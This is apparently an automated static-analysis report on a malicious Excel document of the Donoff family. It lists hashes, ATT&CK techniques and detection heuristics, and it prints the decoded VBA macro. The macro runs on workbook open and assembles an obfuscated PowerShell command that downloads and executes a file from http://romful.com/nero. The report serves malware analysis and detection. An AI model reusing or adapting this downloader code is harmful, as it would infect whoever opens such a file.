Donoff — Office (OLE) malware analysis

Static analysis result for SHA-256 c484128dd841e555…

MALICIOUS

Office (OLE)

Size: 57.5 KB
Created: 2017-08-30 04:11:44
Authoring application: Microsoft Excel
First seen: 2017-09-14
MD5: 322b82692918f84c7dd69f85c76679a8
SHA-1: d93f36cbc5f0b63f2f58b88d424fa5a9dac0d15c
SHA-256: c484128dd841e555c87737e157687d7ce4939ffcfe9dadd4424cf4ab2f0443ed
Risk score: 210

Malware Insights

Donoff · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1071.001 Web Protocols

The Excel document contains VBA macros, including a Workbook_Open macro, that are obfuscated and designed to execute shell commands. The script attempts to download a payload from the URL http://romful.com/nero. This behavior is consistent with the Donoff family, which often uses macro-enabled documents to download and execute further malicious content.

Heuristics (6)

  • ClamAV: Xls.Dropper.Donoff-6758222-0 (critical) [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Xls.Dropper.Donoff-6758222-0
  • VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • Potential Shell call in VBA (critical) [OLE_VBA_SHELL]
    Potential Shell call in VBA
    Matched line in script:
    If msoSortByNone > 1 Then
    Shell trulalaa + """", O
    End If
  • Obfuscated VBA Shell command with URL (critical) [OLE_VBA_OBFUSCATED_SHELL_URL]
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script:
    If msoSortByNone > 1 Then
    Shell trulalaa + """", O
    End If
  • Workbook_Open macro (low) [OLE_VBA_WBOPEN]
    Workbook_Open macro
    Matched line in script:
    Sub Workbook_Open()
    If msoSortByNone > 1 Then
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://romful.com/nero (referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3440 bytes
SHA-256: 20748126847c19b9ce221ed4ed76daed7f9ac4116558a114eeefcc75872e5e7b

Extracted script preview (first 1,000 lines):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function valtescott()
nasanasa = "O"
valtescott = "p" + "r" + nasanasa + "^" + "F"
End Function
Function trulalaa()
trulalaa = debiusius + "e   " + "/c """ + bookkeeper + derfooter
End Function






Function poltergeiis()
zafiraopel = Array(Now(), Null, "Y", Now(), Now(), Now(), Now(), Now())
poltergeiis = "  B^" + zafiraopel(2) + "p" + "a^S^" + "s "
End Function
Function derfooter()
derfooter = "$fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad"
derfooter = derfooter + "='wnloa';$kp='w-ob';$nim='e(''';$mo='De';$uy='fa';$ji='" + "ul" + "t.e" + "x';$" + "po" + "l='em." + "ne';$oe='e''';$jik='rt-p" + "ro';$naw='c" + "ess ''';$lim='bc" + "li';I" + "nv" + "oke-E" + "xp" + "ression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'http://romful.com/nero'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
End Function
Function debiusius()
uliuusd = "ex"
flowerblacker = "CM to inches converter"
debiusius = Left(flowerblacker, 2) + "d." + uliuusd
End Function

Function bookkeeper()
niagararain = Array(Null, Null, Null, Day(Now), "^he" + "l^" + "l", Day(Now), Null, Null, Null, Null, Null, Null, Day(Now))
williamrally = Array(Null, Null, Null, Day(Now), Second(Now), Null, Null, Null, Second(Now), Null, Null, Null, Null, "^U", Null, Null)
jijiutsu = Array(Null, " ", Null, Timer(), Null, Minute(Now), "^" + "E" + "c", Null, Null, Now(), Null, Null, Null, Second(Now))
valkiriad = Array(Null, Null, Day(Now), "^ERS", Day(Now), Null, Null, Day(Now), Day(Now), Null)
shoppergoal = Array(Null, Day(Now), Null, Null, Null, Day(Now), Null, Null, Null, "w")
irregional = "O"
bookkeeper = "p" + "^" + irregional + Array(shoppergoal(9) + valkiriad(3) + niagararain(4) + poltergeystore + " -N" + "o" + valtescott + "I" + "l" + "e^" + "" + "  " + "-" + "e" + "X" + jijiutsu(6) + williamrally(13) & poltergeiis)(0)
End Function



Function poltergeystore()
hhneg = "D"
valeygod = Array(Day(Now), Second(Now), Null, Second(Now), Null, Day(Now), Null, Second(Now), Null, Day(Now), Null, Null, "s" + "^ 1", Null, Second(Now), Null, Null, Second(Now))
ganovey = Array(Day(Now), Null, Day(Now), "  -" + "W^" & "I" + "n", Null, Second(Now), Null, Second(Now), Null, Null, "-n" + "O^", Null, Second(Now), Null, Null, Second(Now))
poolnum = Array(Day(Now), Null, Second(Now), Day(Now), Null, Day(Now), Null, Second(Now), Null, Null, Null, Null, Second(Now), Null, Day(Now), "^N" + "i^N" + "t", Day(Now))
poltergeystore = "^.e^" + "x^e" + "^  " & ganovey(10) + "l -No" + poolnum(15) + Chr(94) + ganovey(3) + hhneg + "O^w" + valeygod(12)
End Function


Sub Workbook_Open()
If msoSortByNone > 1 Then
Shell trulalaa + """", O
End If
End Sub

Function gluerise()
gluerise = "the mirror"
gluerise = Left(gluerise, 2)
End Function



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True